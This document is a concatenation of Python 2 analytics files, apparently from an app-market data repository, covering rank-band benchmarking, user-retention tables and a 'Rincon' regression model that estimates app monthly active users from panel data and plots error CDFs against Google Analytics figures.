df['actual'][df['feed_id'] == 1] = df['downloads'][df['feed_id'] == 1]
df['actual'][df['feed_id'] == 2] = df['sales'][df['feed_id'] == 2]
del df['downloads']
del df['sales']
del df['app_class']
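        # rank bands for separate per-band regressions: 1-20, 21-60, 61-200, 201+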
df['rg_rank'] = 1
df['rg_rank'][df['rank']>20] = 21
df['rg_rank'][df['rank']>60] = 61
df['rg_rank'][df['rank']>200] = 201
df['r_log'] = np.log(df['rank'])
df['actual_log']=np.log(df['actual'])
#print df
#print df.head(100)
for date in DATES:
end_date2 = date.strftime("%Y-%m-%d")
start_date2 = (date - datetime.timedelta(days=7)).strftime("%Y-%m-%d")
df_obs = df[(df['date'] <= end_date2) & (df['date'] >= start_date2)]
print store_id, date
try:
#df_obs.to_csv('%s/benchmark_obs_%s_%s.csv'%(OUTPUT_FILES_PATH, store_id, date), index=False, quoting = csv.QUOTE_NONNUMERIC)
df_res = process_store_date(df_obs, date)
del df_obs
df_res.to_csv('%s/benchmark_data_%s_%s.csv'%(OUTPUT_FILES_PATH, store_id, date), index=False, quoting = csv.QUOTE_NONNUMERIC)
            except Exception as e:
                print e, store_id, date
                exc_type, exc_obj, exc_tb = sys.exc_info()
                fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                print(exc_type, fname, exc_tb.tb_lineno)
                raise  # re-raise after logging (the bare raise used to come first, leaving the prints unreachable)
if __name__ == '__main__':
main()
<file_sep>/aa_au_model/lib/retention.py
def retention(final_selection_of_users, retention_for_new_users, percentages):
"""
retention_for_new_users, here you can set if you want to see retention based on users that are new first seen for that day (True) or all
users that are seen that day (False)
percentages, if True, shows percentages instead of absolute numbers retention
input data frame final_selection_of_users, as generated by final_selection_of_users()
"""
import pandas as pd
import datetime
    # note: when percentages == True, retention_date.iloc[0,2] may not exist if
    # there are no new users for a date (guarded below by the length check)
    users = final_selection_of_users[final_selection_of_users.country == 'US'][['device_id','date']]  # note: hardcoded to US
users['active'] = 1
users['date'] = users.date.apply(lambda x: datetime.datetime(x.year,x.month,x.day))
users.set_index('date', inplace=True)
request_per_day = users.groupby('device_id').resample('1d',how='count')
request_per_day.reset_index(inplace=True)
request_per_day.columns = ['device_id','datetimestamp','timestamp']
dates = pd.date_range(start=final_selection_of_users.date.min(),end=final_selection_of_users.date.max())
resulti = None
for date in dates:
if retention_for_new_users == False:
selected_users = request_per_day[(request_per_day.datetimestamp == date) &
(request_per_day.timestamp > 0)]
else:
min_date_per_device = pd.DataFrame(request_per_day.groupby('device_id').datetimestamp.min()).reset_index()
selected_users = min_date_per_device[min_date_per_device.datetimestamp == date]
selected_users_after_date = pd.merge(request_per_day, selected_users, on='device_id')
selected_users_after_date = selected_users_after_date[selected_users_after_date.datetimestamp_x >= date]
selected_users_after_date['day_id'] = selected_users_after_date.datetimestamp_x - date
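        # convert the timedelta (nanoseconds) to whole days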
selected_users_after_date['day_id'] = selected_users_after_date.day_id.apply(lambda x: int(x)/86400000000000)
retention_date = pd.DataFrame(selected_users_after_date.groupby(['datetimestamp_y','day_id']).device_id.count()).reset_index()
if percentages == True and len(retention_date) > 0:
base_value = retention_date.iloc[0,2]
retention_date['device_id'] = retention_date.device_id.apply(lambda x: round(float(x)/float(base_value),2))
retention_date.iloc[0,2] = base_value
if resulti is None:
resulti = retention_date
else:
resulti = resulti.append(retention_date, ignore_index=True)
retention = resulti.pivot('datetimestamp_y','day_id')
return retention
<file_sep>/google-analytics/rincon_dump/KR-Android/Rincon_model.py
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.ticker as mtick
import datetime
import seaborn
import copy
import sys
import os
from sklearn.linear_model import Lasso, Ridge
from sklearn.svm import SVR, LinearSVR
from sklearn.ensemble import RandomForestRegressor
from sklearn.kernel_ridge import KernelRidge
import pyearth  # needed for the optional 'MARS' branch in model_train
from sklearn import preprocessing
from sklearn.grid_search import GridSearchCV
from sklearn.metrics import mean_squared_error
from sklearn.metrics import make_scorer
from sklearn.cross_validation import cross_val_predict
from sklearn.cross_validation import cross_val_score
class Rincon:
def __init__(self, Debug=False):
self.vlookup = {'T1':{}, 'T2':{}}
self.T1 = None
self.T2 = None
self.outlierPerc = None
self.segments = None
self.Debug = Debug
# Select the raw features
self.features = ['bundle_id', 'Device Type', 'reporters_app', 'Date',
'reporters_all', 'category_id',
'Country',
'time_since_launch', 'Active Users',
'reporters_app_movingAvg',
#'downloads',
'moving_avg_dl', 'total_downloads']
self.numeric_cols = [u'reporters_app', u'reporters_all',
u'time_since_launch', u'reporters_app_movingAvg',
#'downloads',
'moving_avg_dl', 'total_downloads']
self.numeric_cols_log = [u'reporters_app_log', u'reporters_all_log',
u'time_since_launch', u'reporters_app_movingAvg_log',
#'downloads',
'moving_avg_dl_log', 'total_downloads_log']
self._model_ = None
self.best_param = None
self.scaler_ = None
self.featureName_ = None
self.scaler_data = None
def rate_MAE(self, y_truth, y_pred, cutoff=100.0):
assert y_truth.shape[0] == y_pred.shape[0], 'The size of Labels and Predictions do not match'
_data_ = pd.DataFrame( dict(truth=y_truth, prediction=list(y_pred)) )
_data_['error_rate'] = np.abs( (_data_['prediction'] - _data_['truth']) / _data_['truth'] )
# convert percent to numeric
if cutoff:
cutoff = float(cutoff) / 100.0
_data_ = _data_[_data_['error_rate'] <= cutoff]
_data_ = _data_.dropna()
return np.sum( _data_['error_rate'] ) / float(_data_['truth'].shape[0])
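    # Illustrative sketch, never called anywhere: rate_MAE averages the relative
    # error |pred/truth - 1| over the samples whose error is within the cutoff
    # (cutoff is given in percent).
    def _example_rate_mae(self):
        truth = pd.Series([100.0, 200.0])
        pred = np.array([110.0, 150.0])  # relative errors: 10% and 25%
        print self.rate_MAE(truth, pred)  # (0.10 + 0.25) / 2 = 0.175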
def load_data(self, filename, train=True):
        # train=True means the file carries GA ground truth ('Active Users')
if train == True:
_data_ = pd.read_csv(filename)
_data_['Projected MAU DIFF %'] = _data_['reporters_app'] / _data_['Active Users'] - 1.0
_data_['Projected MAU DIFF %'] = _data_['Projected MAU DIFF %'].replace(np.inf, np.nan)
else:
try:
_data_ = pd.read_csv(filename)
_data_ = _data_.drop(['Session Duration'],axis=1)
_data_ = _data_.drop(['time_since_current_launch'], axis=1)
print 'Load data size before filtering:', _data_.shape
_data_ = _data_[~_data_['time_since_launch'].isnull()]
print 'Load data size after filtering:', _data_.shape
        except:
            # normalise any read/parse failure to KeyError for the caller
            raise KeyError
_data_['category_id'] = _data_['category_id'].apply(int).apply(str)
return _data_
def data_preprocessing(self, _data_, std_scale=None, target_col='Active Users',
exclude_col=['bundle_id', 'Active Users']):
if exclude_col:
x_ = _data_.drop(exclude_col, axis=1, inplace=False)
else:
x_ = _data_.copy()
features_to_log = ['reporters_app', 'reporters_all', 'reporters_app_movingAvg', 'moving_avg_dl','total_downloads']
# any numeric transformation should be entered here
x_['reporters_app'] = np.log(x_['reporters_app'])
x_['reporters_all'] = np.log(x_['reporters_all'])
x_['reporters_app_movingAvg'] = np.log(x_['reporters_app_movingAvg'])
x_['moving_avg_dl'] = np.log(x_['moving_avg_dl']+1.0) / x_['reporters_app_movingAvg']
x_['total_downloads'] = np.log(x_['total_downloads']+1.0) / x_['reporters_app']
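        # note: the two download features end up as ratios of log-downloads to
        # log-reporters, not plain log transforms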
x_.columns = map(lambda item: item + '_log' if (item in features_to_log) else item, x_.columns)
if target_col:
y_ = np.log(_data_[target_col])
self.scaler_ = preprocessing.StandardScaler().fit(x_[self.numeric_cols_log])
self.scaler_data = x_[self.numeric_cols_log]
else:
y_ = None
            assert self.scaler_ is not None, 'scaler has not been calculated!'
# Simple treatment of datetime
if 'Date' in x_.columns:
x_['month'] = x_['Date'].dt.month.apply(str)
x_['year'] = x_['Date'].dt.year.apply(str)
x_.drop(['Date'], axis=1, inplace=True)
try:
x_[self.numeric_cols_log] = self.scaler_.transform(x_[self.numeric_cols_log])
except:
ValueError('The feature scaler does not exist!')
# dummy coding
x_ = pd.get_dummies(x_)
if target_col:
self.featureName_ = x_.columns
return x_, y_
def optimizer(self, x_, y_, param_list, score_function, n_jobs=4):
'''
param_list: a container of the model parameters that varies algorithm by algorithm
'''
        grid = GridSearchCV(self._model_, param_grid=param_list, cv=5,
                            n_jobs=n_jobs, scoring=score_function)
grid.fit(x_, y_)
self.best_param = grid.best_params_
print 'Scoring Function:', score_function
print "Parameter List:", param_list
print "Best Parameters:", self.best_param
def segmented_interporlation(self, rincon_pred, baseline_):
'''
T1: in-band largest MAU
T2: out-of-band largest MAU
'''
if baseline_ <= self.T1:
return rincon_pred
if baseline_ > self.T2:
return baseline_
else:
a1 = (self.T2 - baseline_) / (self.T2 - self.T1)
a2 = (baseline_ - self.T1) / (self.T2 - self.T1)
weighted = a1 * rincon_pred + a2 * baseline_
return weighted
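    # Illustrative sketch, never called anywhere: with T1=100 and T2=200 a
    # baseline of 150 sits halfway between the bands, so the blend weights
    # are 0.5/0.5.
    def _example_interpolation(self):
        self.T1, self.T2 = 100.0, 200.0  # hypothetical thresholds
        print self.segmented_interporlation(80.0, 150.0)  # 0.5*80 + 0.5*150 = 115.0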
def interpolation(self, _data_, predCol='pred_SVR', baseline_='reporters_app'):
interpolated_pred = []
for ind in xrange(_data_.shape[0]):
model_pred, mydm_v1 = _data_[[predCol, baseline_]].iloc[ind].tolist()
interpolated_pred.append(self.segmented_interporlation(model_pred, mydm_v1))
_data_['interpolated_pred'] = interpolated_pred
if self.Debug:
print 'DEBUG:\n', _data_[_data_['interpolated_pred'].isnull()]
        assert not _data_['interpolated_pred'].isnull().any(), 'NULL interpolated MAU exists!'
def threshold_finder(self, _data_, threshold='in-band'):
if threshold == 'in-band':
qt = 1.0
else:
qt = 0.99
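        # in-band keeps the per-(Country, Device) max of reporters_app (qt=1.0);
        # out-of-band uses the 99th percentile, presumably to damp outliers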
vlookup = _data_.groupby(['Country', 'Device Type']).\
agg({'reporters_app':lambda x:x.quantile(qt)}).reset_index()
vlookup = dict(zip(zip(vlookup['Country'], vlookup['Device Type']),
vlookup['reporters_app']))
if threshold == 'in-band':
for key, value in vlookup.iteritems():
if key in self.vlookup['T1']:
print 'Warning: rewriting T1 key =', key
self.vlookup['T1'][key] = value
elif threshold == 'out-of-band':
for key, value in vlookup.iteritems():
if key in self.vlookup['T2']:
print 'Warning: rewriting T2 key =', key
self.vlookup['T2'][key] = value
def model_train(self, _data_, modelName='svr', outlierPerc=[5,90], segments=[50,100], excludeIDs=None):
self.segments = segments
self.outlierPerc = outlierPerc
#print _data_['Projected MAU DIFF %']
# outlier filtering
thres = np.percentile(_data_['Projected MAU DIFF %'],
q=self.outlierPerc)
_data_ = _data_[(_data_['Projected MAU DIFF %']>=thres[0])
& (_data_['Projected MAU DIFF %'] <=thres[1])
].copy()
if self.Debug:
print '\nData Summary:'
print 'Outliers\' Error Rate Percentile:', self.outlierPerc, thres
# GA sampling issue filtering
thres = np.percentile(_data_['reporters_app'],
q=self.segments)
_data_ = _data_[(_data_['reporters_app']>=thres[0])
& (_data_['reporters_app'] <=thres[1])
].copy()
if excludeIDs:
_data_ = _data_[~_data_['bundle_id'].isin(excludeIDs)]
self.threshold_finder(_data_, threshold='in-band')
if self.Debug:
print 'App MAU Percentile:', segments, thres
#print _data_.groupby(['bundle_id', 'Device Type', 'Country']).\
#agg({'reporters_app':'mean',
# 'Projected MAU DIFF %':'mean',
# 'Active Users':'mean'}).\
#sort(['reporters_app'], ascending=False).head(25)
#print _data_.groupby(['Country', 'Date', 'Device Type']).\
#agg({'bundle_id':lambda x:x.nunique()})
#plot_3D(_data_, angle=25)
x_, y_ = self.data_preprocessing(_data_[self.features],
exclude_col=['bundle_id', 'Active Users', 'Date'])
#if self.Debug:
#print 'Check Z-Scaling Mean:\n', x_.mean()
#print 'Check Z-Scaling Stddev:\n', x_.std()
# grid search for best parameters
if modelName == 'svr':
# SVR with Linear Kernel
params = {'C':[2**i for i in range(-10,15)]}
self._model_ = SVR(C=10, tol=1e-8, kernel='linear', max_iter=2e5)
elif modelName == 'rbf':
# SVR with RBF Kernel
params = {'C':[2**i for i in range(20,35)], 'gamma':[2**i for i in range(-12,-2)]}
self._model_ = SVR(C=1e5, gamma=0.01, tol=1e-8, kernel='rbf', max_iter=2e5)
        elif modelName == 'MARS':
# MARS
params = {'max_degree':[i for i in range(1,10)],
'penalty':[2**i for i in range(-2,2)],
'max_terms':[i for i in range(4,20)]}
self._model_ = pyearth.Earth(enable_pruning=True)
PMAE = make_scorer(self.rate_MAE, greater_is_better=False)
self.optimizer(x_, y_, params, n_jobs=7, score_function=PMAE)
# model initialization
if modelName == 'svr':
self._model_ = SVR(C=self.best_param['C'], tol=1e-8,
kernel='linear', max_iter=2e5)
elif modelName == 'rbf':
self._model_ = SVR(C=self.best_param['C'],
gamma=self.best_param['gamma'],
tol=1e-8,
kernel='rbf', max_iter=2e5)
elif modelName == 'MARS':
self._model_ = pyearth.Earth(max_degree=self.best_param['max_degree'],
max_terms=self.best_param['max_terms'],
penalty=self.best_param['penalty'],
enable_pruning=True)
if self.Debug:
# variable importance
rf = RandomForestRegressor(n_estimators=200, max_features= None, max_depth=8,
random_state=0, n_jobs=12)
indices_svr = self.variable_importance(rf, x_, y_, fnames=self.featureName_,
model_name='Random Forest', col='g', TOP_N=15)
pred = self.model_training_v2(self._model_, x_, y_, log=False,
baseline=np.log(_data_['reporters_app']), model_name='SVR')
_data_['pred_SVR'] = np.exp(pred)
print 'Number of negative MAU samples is:', _data_[_data_['pred_SVR']<=0].shape[0],
print 'out of total sample number =',_data_['pred_SVR'].shape[0]
print 'Samples with negative Rincon prediction:'
print _data_[_data_['pred_SVR']<=0]
del pred
# cross-validation performance
self.CV_performance(self._model_, x_, y_, n_folds=5)
# CDF curves
self.cdf_with_topapps_v2(_data_, TOPAPP_Bucket=4, xlim=100, pred_col='pred_SVR',
baseline='reporters_app', modelname='Linear SVR')
tmp = self.calculate_error_distribution(_data_, baseline='reporters_app', pred_col='pred_SVR')
#print tmp
self.plot_error_distribution(tmp, 'Linear SVR Error Rate CDF', cutoff=[0,100])
del tmp
#tmp = self.calculate_error_distribution_v1(_data_, baseline='reporters_app', pred_col='pred_SVR')
#self.plot_error_distribution(tmp, 'Linear SVR Error Rate CDF', cutoff=[-200,100])
#del tmp
#weights = 1.0 / np.log(_data_['reporters_app'])
self._model_.fit(x_, y_)
return _data_
def predict(self, _data_):
assert _data_['Country'].unique().shape[0] == 1 and \
_data_['Device Type'].unique().shape[0] == 1,\
'Make sure the data only contains 1 country and 1 device.'
self.T1 = self.vlookup['T1'][tuple(_data_[['Country', 'Device Type']].iloc[0,:])]
self.T2 = self.vlookup['T2'][tuple(_data_[['Country', 'Device Type']].iloc[0,:])]
'''
Deprecated below due to system apps:
if 'largest_mau_out_of_band' in _data_.columns:
self.T2 = _data_['largest_mau_out_of_band'].tolist()[0]
else:
self.T2 = self.vlookup['T2'][tuple(_data_[['Country', 'Device Type']].iloc[0,:])]
'''
if self.Debug:
print 'Validation data size:', _data_.shape
print '\nData Summary:'
print 'Lower bound T1 =', self.T1
print 'Upper bound T2 =', self.T2
print _data_.groupby(['Country', 'Date', 'Device Type']).\
agg({'bundle_id':lambda x:x.nunique()})
val_features = copy.copy(self.features)
val_features.remove('Active Users')
# select the raw features
x_, y_ = self.data_preprocessing(_data_[val_features],
exclude_col=['bundle_id', 'Date'],
target_col=None)
if self.Debug:
print 'Check 1: Removing redundant features:'
for name in x_.columns:
if name not in self.featureName_:
x_.drop(name, axis=1, inplace=True)
if self.Debug:
print name
if self.Debug:
print '\nCheck 2: Adding missing features:'
cnt = 0
for name in self.featureName_:
if name not in x_.columns:
x_.insert(cnt, name, 0)
if self.Debug:
print name
cnt += 1
# segmented models
_data_['raw_pred'] = np.exp(self._model_.predict(x_))
self.interpolation(_data_, predCol='raw_pred', baseline_='reporters_app')
# business constraints
_data_['final_pred'] = _data_.\
apply(lambda x: x['reporters_app']
if x['interpolated_pred']<=0
or x['interpolated_pred']>x['total_downloads']
else x['interpolated_pred'], axis=1)
if 'Active Users' in _data_.columns:
return _data_[['bundle_id', 'app_id', 'app_name','Country', 'Device Type',
'Date', 'category_name', 'Active Users', 'reporters_app',
'final_pred']]
else:
return _data_[['bundle_id', 'app_id','app_name', 'Country', 'Device Type',
'category_name', 'Date', 'final_pred', 'reporters_app']]
def variable_importance(self, _model_, x_training, y_training, fnames, model_name='Random Forest', col='r', TOP_N=50):
_model_.fit(x_training, y_training)
if model_name == 'Random Forest':
importances = _model_.feature_importances_
std = np.std([tree.feature_importances_ for tree in _model_.estimators_],
axis=0)
elif model_name == 'Linear Regression':
importances = np.abs(_model_.coef_)
std = np.array([0.0] * importances.shape[0])
elif model_name == 'SVR':
try:
importances = np.abs(_model_.coef_.T[:,0])
except:
try:
importances = np.abs(_model_.coef_)
except:
raise IndexError
std = np.array([0.0] * importances.shape[0])
assert model_name in ['Random Forest', 'Linear Regression', 'SVR'], \
ValueError('The model is beyond the current support model list for variable importance!')
indices_ = np.argsort(importances)[::-1]
# Print the feature ranking
print("Feature ranking:")
for f in range(TOP_N):
print("%d. feature %d -- %s (%f)" % (f + 1, indices_[f], fnames[indices_[f]],
importances[indices_[f]]))
# Plot the feature importances of the forest
fig, ax = plt.subplots(figsize=(15, 10))
plt.title("{} Feature Importances".format(model_name), fontsize=20)
plt.bar(range(TOP_N), importances[indices_[:TOP_N]],
color=col, yerr=std[indices_[:TOP_N]], align="center")
plt.xticks(range(TOP_N), [name.decode('utf8')
for name in list(fnames[indices_])], fontsize=12)
ax.set_xticklabels([name.decode('utf8')
for name in list(fnames[indices_])], rotation=90)
plt.yticks(fontsize=12)
ax.set_ylabel('Feature Importance', fontsize=15)
plt.xlim([-1, TOP_N])
plt.show()
return indices_
def normalized_MSE(self, y_truth, y_pred):
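        # relative L2 error: ||pred - truth|| / ||truth||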
return np.sqrt( np.sum((y_pred - y_truth) ** 2) / np.sum(y_truth ** 2) )
def CV_performance(self, model, x_trainining, y_training, n_folds=5):
rmse = np.sqrt(-cross_val_score(model, x_trainining, y_training, cv=n_folds, scoring='mean_squared_error'))
print 'All features are included: RMSE = {} +- {}'.format(rmse.mean(), rmse.std())
NMSE = make_scorer(self.normalized_MSE, greater_is_better=False)
nmse = np.sqrt(-cross_val_score(model, x_trainining, y_training, cv=n_folds, scoring=NMSE))
print 'All features are included: NMSE = {} +- {}'.format(nmse.mean(), nmse.std())
PMAE = make_scorer(self.rate_MAE, greater_is_better=False)
pmae = -cross_val_score(model, x_trainining, y_training, cv=n_folds, scoring=PMAE)
print 'All features are included: PMAE = {} +- {}'.format(pmae.mean(), pmae.std())
def calculate_error_distribution(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
            # original error: percent difference between the baseline (mydm_v1) and Active Users
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * np.abs(mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
mdm_vs_ga_benchmark['abs_error[pred]'] = 100 * np.abs(mdm_vs_ga_benchmark[pred_col] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in app_reporters.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
error_distribution['proportion_of_error[pred]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[pred]'].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def calculate_error_distribution_v3(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * np.abs(mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
mdm_vs_ga_benchmark['abs_error[pred]'] = 100 * np.abs(mdm_vs_ga_benchmark[pred_col] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
error_distribution = pd.DataFrame({'abs_error': np.arange(0,200)})
if baseline in app_reporters.columns:
count, bins = np.histogram(mdm_vs_ga_benchmark['abs_error[original]'], bins=np.arange(-1,200))
total = mdm_vs_ga_benchmark['abs_error[original]'].dropna().shape[0]
error_distribution['proportion_of_error[original]'] = 100.0*np.cumsum(count) / total
count, bins = np.histogram(mdm_vs_ga_benchmark['abs_error[pred]'], bins=np.arange(-1,200))
total = mdm_vs_ga_benchmark['abs_error[pred]'].dropna().shape[0]
error_distribution['proportion_of_error[pred]'] = 100.0*np.cumsum(count) / total
return error_distribution
def calculate_error_distribution_v1(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * (mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
mdm_vs_ga_benchmark['abs_error[pred]'] = 100 * (mdm_vs_ga_benchmark[pred_col] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in app_reporters.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
error_distribution['proportion_of_error[pred]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[pred]'].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def calculate_error_distribution_v2(self, app_reporters, pred_col='pred', baseline='mydm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in app_reporters.columns:
mdm_vs_ga_benchmark['abs_error[original]'] = \
mdm_vs_ga_benchmark.apply(lambda x:
100 * (x[baseline] / x['Active Users'] - 1)
if x[baseline] > x['Active Users']
else 100 * (x['Active Users'] / x[baseline] - 1),
axis=1)
mdm_vs_ga_benchmark['abs_error[pred]'] = \
mdm_vs_ga_benchmark.apply(lambda x:
100 * (x[pred_col] / x['Active Users'] - 1)
if x[pred_col] > x['Active Users']
else 100 * (x['Active Users'] / x[pred_col] - 1),
axis=1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in app_reporters.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
error_distribution['proportion_of_error[pred]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[pred]'].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def plot_error_distribution(self, error_distribution, title_template, cutoff=[0,200]):
nlevels = error_distribution['Device Type'].nunique()
groupby_order = ['Country', 'Device Type']
count = 1
legend_list = []
ticks = mtick.FormatStrFormatter('%.0f%%')
col_list = [seaborn.xkcd_rgb['pale red'], seaborn.xkcd_rgb['medium green'],
'orange', seaborn.xkcd_rgb['denim blue'], seaborn.xkcd_rgb['medium green'], ]
for x,g in error_distribution.groupby(groupby_order):
if count % nlevels == 1:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.xaxis.set_major_formatter(ticks)
ax.yaxis.set_major_formatter(ticks)
print 'Rincon:'
print g[(g['abs_error[pred]']>=19)
&(g['abs_error[pred]']<=21)][['proportion_of_error[pred]', 'abs_error[pred]']]
print g[(g['abs_error[pred]']>=39)
&(g['abs_error[pred]']<=41)][['proportion_of_error[pred]', 'abs_error[pred]']]
print g[(g['abs_error[pred]']>=59)
&(g['abs_error[pred]']<=61)][['proportion_of_error[pred]', 'abs_error[pred]']]
g[pd.notnull(g['proportion_of_error[pred]'])].sort('abs_error[pred]').\
set_index('abs_error[pred]')['proportion_of_error[pred]'].\
plot(style='k-', figsize=(15,10), lw=4, fontsize=15, c=col_list[count % nlevels - 1])
legend_list.append('-'.join(x) + '_Rincon')
if 'proportion_of_error[original]' in error_distribution.columns:
print 'Baseline:'
print g[(g['abs_error[original]']>=19)
&(g['abs_error[original]']<=21)][['proportion_of_error[original]', 'abs_error[original]']]
print g[(g['abs_error[original]']>=39)
&(g['abs_error[original]']<=41)][['proportion_of_error[original]', 'abs_error[original]']]
print g[(g['abs_error[original]']>=59)
&(g['abs_error[original]']<=61)][['proportion_of_error[original]', 'abs_error[original]']]
g[pd.notnull(g['proportion_of_error[original]'])].sort('abs_error[original]').\
set_index('abs_error[original]')['proportion_of_error[original]'].\
plot(style='--', figsize=(15,10), lw=4, fontsize=15, alpha=1.0,
c=seaborn.xkcd_rgb['pale red'])
legend_list.append('-'.join(x) + '_MDM_v1.1')
plt.ylabel('proportion of apps', fontsize=23)
plt.xlabel('absolute percentage error', fontsize=23)
plt.legend(legend_list, loc = 'lower right', prop={'size':23})
plt.xlim(cutoff)
plt.title( x[0] + ' : ' + title_template, fontsize=25)
if count % nlevels == 0:
plt.show()
legend_list = []
count += 1
def calculate_error_superimpose(self, app_reporters, pred_cols=['pred'], baseline='mdm_v1'):
mdm_vs_ga_benchmark = app_reporters.copy()
if baseline in mdm_vs_ga_benchmark.columns:
assert any(mdm_vs_ga_benchmark[baseline].isnull())==False, 'Appending baseline numbers fails!'
mdm_vs_ga_benchmark['abs_error[original]'] = 100 * np.abs(mdm_vs_ga_benchmark[baseline] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
for key in pred_cols:
mdm_vs_ga_benchmark['mau_{}'.format(key)] = mdm_vs_ga_benchmark[key]
mdm_vs_ga_benchmark['abs_error[{}]'.format(key)] = 100 * np.abs(mdm_vs_ga_benchmark['mau_{}'.format(key)] / \
mdm_vs_ga_benchmark['Active Users'] - 1)
def _unique(_group):
return pd.Series({'app_count':_group.bundle_id.shape[0]})
_df = mdm_vs_ga_benchmark.reset_index().groupby(['Device Type', 'Country']).apply(_unique).reset_index()
error_distribution = pd.merge(mdm_vs_ga_benchmark.reset_index(),
_df,
on=['Device Type','Country'])
if baseline in mdm_vs_ga_benchmark.columns:
error_distribution['proportion_of_error[original]'] = error_distribution.groupby(['Device Type','Country'])\
['abs_error[original]'].rank() \
/ error_distribution.app_count * 100.
for key in pred_cols:
error_distribution['proportion_of_error[{}]'.format(key)] = \
error_distribution.groupby(['Device Type','Country'])\
['abs_error[{}]'.format(key)].rank() \
/ error_distribution.app_count * 100.
error_distribution = error_distribution.set_index(['Device Type','Country','bundle_id'])
return error_distribution.reset_index()
def plot_error_superimpose(self, error_distribution, title_template, pred_cols=['pred'], cutoff=[0,200], nlevels=3):
n_plots = 1
groupby_order = ['Country', 'Device Type']
count = 1
legend_list = []
#Plotting constant
ticks = mtick.FormatStrFormatter('%.0f%%')
col_list = seaborn.color_palette('deep')
for x,g in error_distribution.groupby(groupby_order):
if count % n_plots == 1:
fig = plt.figure()
ax = fig.add_subplot(111)
ax.xaxis.set_major_formatter(ticks)
ax.yaxis.set_major_formatter(ticks)
for col_cnt, key in enumerate(pred_cols):
g[pd.notnull(g['proportion_of_error[{}]'.format(key)])].sort('abs_error[{}]'.format(key)).\
set_index('abs_error[{}]'.format(key))['proportion_of_error[{}]'.format(key)].\
plot(style='-', figsize=(15,10), fontsize=20, c=col_list[col_cnt % nlevels],
alpha = 1.0 / float( len(pred_cols) / nlevels - col_cnt / nlevels),
lw = 2*(col_cnt / nlevels + 2) )
legend_list.append('-'.join(x) + '_{}'.format(key))
if 'abs_error[original]' in error_distribution.columns:
g[pd.notnull(g['proportion_of_error[original]'])].sort('abs_error[original]').\
set_index('abs_error[original]')['proportion_of_error[original]'].\
plot(style='--', figsize=(15,10), lw=7, fontsize=20, alpha=0.8,
c= 'orange')
legend_list.append('-'.join(x) + '_original')
plt.ylabel('proportion of apps', fontsize=20)
plt.xlabel('absolute percentage error', fontsize=20)
plt.legend(legend_list, loc = 'best', prop={'size':20})
plt.xlim(cutoff)
plt.title( x[0] + ' ' + x[1] + ' : ' + title_template, fontsize=24, y=1.04)
if count % n_plots == 0:
plt.show()
legend_list = []
count += 1
def cdf_with_topapps(self, data, modelname='Supervised Learning', baseline=None, TOPAPP_Bucket=4, pred_col='pred', xlim=100):
cols = seaborn.color_palette('deep')
_data_ = data.copy()
if pred_col:
_data_['abs_error[{}]'.format(pred_col)] = 100 * np.abs(_data_[pred_col] * 1.0 / _data_['Active Users'] - 1.0)
if baseline in _data_.columns:
_data_['abs_error[original]'] = 100 * np.abs(_data_[baseline] * 1.0 / _data_['Active Users'] - 1.0)
for n, g in _data_.groupby(['Device Type', 'Country']):
fig = plt.figure(figsize=(10,8))
ax = fig.add_subplot(111)
g = g.sort('Active Users', ascending=False)
title = 'Learning Model = %s, %s, %s, Cumulative Top Apps'%(modelname, n[0], n[1])
TOPAPPS = xrange(g.shape[0]/TOPAPP_Bucket, g.shape[0]+1, g.shape[0]/TOPAPP_Bucket)
for cnt, topapp in enumerate(TOPAPPS):
g_capped = g[:topapp].copy()
if pred_col:
